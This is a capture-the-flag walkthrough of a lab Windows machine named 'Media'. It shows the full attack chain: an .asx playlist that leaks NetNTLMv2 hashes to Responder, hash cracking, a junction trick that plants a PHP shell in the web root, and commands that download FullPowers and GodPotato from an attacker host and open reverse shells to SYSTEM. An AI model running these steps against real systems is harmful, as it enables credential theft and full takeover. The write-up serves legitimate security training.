- Written by pr0m0ly
Media
Media is a Windows medium machine created by enox. It involves phishing through Windows Media Player, and escalating privileges via file redirection.
Recon
➜ ~ nmap -T4 --min-rate 5000 10.10.86.203 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-14 15:25 CEST
Nmap scan report for 10.10.86.203
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA)
| 256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA)
|_ 256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: ProMotion Studio
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2023-10-09T13:41:32
|_Not valid after: 2024-04-09T13:41:32
| rdp-ntlm-info:
| Target_Name: MEDIA
| NetBIOS_Domain_Name: MEDIA
| NetBIOS_Computer_Name: MEDIA
| DNS_Domain_Name: MEDIA
| DNS_Computer_Name: MEDIA
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-14T13:29:18+00:00
|_ssl-date: 2023-10-14T13:29:22+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
The only interesting thing right now is the http server, so let’s start digging.
HTTP
On the webpage, we can see that it has a contact form to join the team, where we can submit a video and apparently someone will review it:
My first thought was that i needed to find an exploit for windows media player in order to get RCE. But after a lot of researching i found the following article:
living-off-the-land-stealing-netntlm-hashes
This says:
Media players tend to support many audio and video file formats and playlists.
Playlists can be seen as a collection of links to external files, including files
located on network shares. Naturally this can be abused to steal NetNTLM hashes.
Windows Media Player is no exception, opening a specially crafted playlist
in Windows Media Player can potentially disclose hashes to an attacker.
So we can just try to craft a file that loads a share controlled by us and disclose the hash of who is accessing the file. Let’s try that:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://10.8.0.233/fakeshare/fakefile.wma"/>
</entry>
</asx>
After uploading this file we got a hit on our responder:
➜ ~ sudo responder -I tun0
[sudo] contraseña para pr0m0ly:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<------------------------- SNIP ------------------------------>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.86.203
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash : enox::MEDIA:50244cd3103f99e4:B8EBDA9C31A5A2E4448610D6C13xxxx:0101000000000000803CDDE6B3FED901C3EA5381EE810BC50000000002000800390047005600530001001E00570049004E002D00420032003800470036004B004200590030005300510004003400570049004E002D00420032003800470036004B00420059003000530051002E0039004700560053002E004C004F00430041004C000300140039004700560053002E004C004F00430041004C000500140039004700560053002E004C004F00430041004C0007000800803CDDE6B3FED90106000400020000000800300030000000000000000000000000300000480B9D8087423A3AD17EC240C19F3C1C19B94C7382E80263773D602A13497D730A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0030002E003200330033000000000000000000
Once we got the hash we can try to crack it:
➜ Media john -w:/usr/share/wordlists/rockyou.txt enox.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<redacted> (enox)
1g 0:00:00:06 DONE (2023-10-14 15:50) 0.1529g/s 2039Kp/s 2039Kc/s 2039KC/s 1234ถ6789..1234dork
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
And we got a password! We can now ssh onto the box.
Shell as enox
We can try to list the privileges and groups from the user enox, but we won’t find anything interesting.
After a bit of enumeration we spot the ReviewService which runs review.ps1 by enox user.
So we should take a look at how those files are managed by the server.
Let’s take a look at the index.php so we understand how exactly the process of submitting a file and being reviewed is handled:
<?php
error_reporting(0);
// Your PHP code for handling form submission and file upload goes here.
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
$firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
$lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
$email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);
// Create a folder name using the MD5 hash of Firstname + Lastname + Email
$folderName = md5($firstname . $lastname . $email);
// Create the full upload directory path
$targetDir = $uploadDir . $folderName . '/';
// Ensure the directory exists; create it if not
if (!file_exists($targetDir)) {
mkdir($targetDir, 0777, true);
}
// Sanitize the filename to remove unsafe characters
$originalFilename = $_FILES["fileToUpload"]["name"];
$sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);
// Build the full path to the target file
$targetFile = $targetDir . $sanitizedFilename;
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";
// Update the todo.txt file
$todoFile = $uploadDir . 'todo.txt';
$todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";
// Append the new line to the file
file_put_contents($todoFile, $todoContent, FILE_APPEND);
} else {
echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
}
}
?>
This PHP code, handles the user submissions where they upload a file. It stores the uploaded file on a folder with a name computed using the firstname, lastname and email and calculating the md5hash on them.
So what if we create a symlink from the created folder that points to htdocs? We should be able to upload php files and get code execution as the user running the web server. So let’s do that:
First of all, let’s confirm that we can’t write on htdocs:
enox@MEDIA C:\xampp\htdocs>echo "test" > test.php
Access is denied.
After analysing the \Windows\Tasks\Uploads dir we can see the following:
enox@MEDIA C:\Windows\Tasks\Uploads>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads
10/14/2023 08:05 AM <DIR> .
10/02/2023 11:04 AM <DIR> ..
10/14/2023 08:05 AM <DIR> d41d8cd98f00b204e9800998ecf8427e
10/14/2023 08:05 AM 70 todo.txt
1 File(s) 70 bytes
3 Dir(s) 8,123,363,328 bytes free
enox@MEDIA C:\Windows\Tasks\Uploads>type todo.txt
Filename: leak.asx, Random Variable: d41d8cd98f00b204e9800998ecf8427e
enox@MEDIA C:\Windows\Tasks\Uploads>dir d41d8cd98f00b204e9800998ecf8427e
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e
10/14/2023 08:05 AM <DIR> .
10/14/2023 08:05 AM <DIR> ..
10/14/2023 08:05 AM 133 leak.asx
1 File(s) 133 bytes
2 Dir(s) 8,123,199,488 bytes free
There is the folder “d41d8cd98f00b204e9800998ecf8427e” containing the file we previously uploaded, so we need to remove it in order to create the symlink:
enox@MEDIA C:\Windows\Tasks\Uploads>rmdir /S d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e, Are you sure (Y/N)? Y
enox@MEDIA C:\Windows\Tasks\Uploads>mklink /J C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e <<===>> C:\xampp\htdocs
enox@MEDIA C:\Windows\Tasks\Uploads>dir
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads
10/14/2023 08:18 AM <DIR> .
10/02/2023 11:04 AM <DIR> ..
10/14/2023 08:18 AM <JUNCTION> d41d8cd98f00b204e9800998ecf8427e [C:\xampp\htdocs]
10/14/2023 08:05 AM 0 todo.txt
1 File(s) 0 bytes
3 Dir(s) 8,122,937,344 bytes free
And as we can see, now it is pointing to the htdocs folder, so we could try just to upload a shell in php there:
enox@MEDIA C:\Windows\Tasks\Uploads>dir d41d8cd98f00b204e9800998ecf8427e
Volume in drive C has no label.
Volume Serial Number is EAD8-5D48
Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e
10/14/2023 08:30 AM <DIR> .
10/02/2023 11:03 AM <DIR> ..
10/02/2023 10:27 AM <DIR> assets
10/02/2023 10:27 AM <DIR> css
10/10/2023 05:00 AM 20,563 index.php
10/02/2023 10:27 AM <DIR> js
10/14/2023 08:30 AM 32 shell.php
2 File(s) 20,595 bytes
5 Dir(s) 8,122,839,040 bytes free
And we got the shell uploaded!
Shell as Local Service
After receiving the shell we can check the privileges of the user:
➜ ~ nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.0.233] from (UNKNOWN) [10.10.75.10] 51018
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\xampp\htdocs> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Well we know that there are some privileges that are missing, so we could try to use Full Powers to restore them.
PS C:\xampp\htdocs> cmd /c 'curl 10.8.0.233/FullPowers.exe -s -o fp.exe && fp.exe'
[+] Started dummy thread with id 4280
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Now, with this privileges we can just fire GodPotato to get admin:
C:\xampp\htdocs>curl 10.8.0.233/GodPotato-NET4.exe -s -o gp.exe && powershell /c .\gp.exe -cmd 'cmd.exe /c whoami' && del gp.exe
[*] CombaseModule: 0x140716561596416
[*] DispatchTable: 0x140716564187464
[*] UseProtseqFunction: 0x140716563481936
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\7dcb031c-46dd-48fb-971e-f0953388feea\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002402-1004-ffff-b70e-ceae24aa0d30
[*] DCOM obj OXID: 0xcc68ab4cd45495f1
[*] DCOM obj OID: 0x6d7a16312d082df7
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 892 Token:0x736 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4760
nt authority\system
Shell as System
Finally if we want to get a shell we can just get it and read the flag:
C:\xampp\htdocs>curl 10.8.0.233/GodPotato-NET4.exe -s -o gp.exe && powershell /c .\gp.exe -cmd 'cmd.exe /c rcat_10.8.0.233_443.exe' && del gp.exe
➜ ~ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.0.233] from (UNKNOWN) [10.10.75.10] 51420
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\xampp\htdocs> whoami
nt authority\system
PS C:\xampp\htdocs> type C:\Users\Administrator\Desktop\root.txt
VL{**********************}